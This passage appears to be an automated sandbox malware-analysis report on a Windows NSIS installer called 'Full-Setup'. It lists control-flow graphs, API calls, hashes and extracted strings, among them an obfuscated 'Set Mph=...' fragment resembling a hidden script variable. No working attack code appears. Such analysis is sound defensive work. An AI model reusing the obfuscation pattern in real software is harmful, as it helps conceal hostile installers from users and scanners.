                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                          • String ID: ExteriorGeographyWaterUniversities$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                          • API String ID: 4286501637-1297425327
                                                                                                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                          Strings
                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00427773,00403792,00000000), ref: 004034FF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                          Strings
                                                                                                                                                                          • Set Mph=aecIQAssist-Para-HlDPassport-Labels-TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-ClYFi-Pty-Framing-D, xrefs: 004033FD
                                                                                                                                                                          • pAB, xrefs: 004033AB
                                                                                                                                                                          • ... %d%%, xrefs: 004034C8
                                                                                                                                                                          • swB, xrefs: 0040346F, 0040348A, 00403513
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                          • String ID: ... %d%%$Set Mph=aecIQAssist-Para-HlDPassport-Labels-TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-ClYFi-Pty-Framing-D$pAB$swB
                                                                                                                                                                          • API String ID: 651206458-1625036649
                                                                                                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GlobalFree.KERNELBASE(006887D8), ref: 00402387
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                          • String ID: Exch: stack < %d elements$ExteriorGeographyWaterUniversities$Pop: stack empty
                                                                                                                                                                          • API String ID: 1459762280-2794156658
                                                                                                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          • GlobalFree.KERNELBASE(006887D8), ref: 00402387
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                          Strings
                                                                                                                                                                          • ExteriorGeographyWaterUniversities, xrefs: 00402770
                                                                                                                                                                          • <RM>, xrefs: 00402713
                                                                                                                                                                          • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                          • String ID: <RM>$ExteriorGeographyWaterUniversities$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                          • API String ID: 247603264-2760581209
                                                                                                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
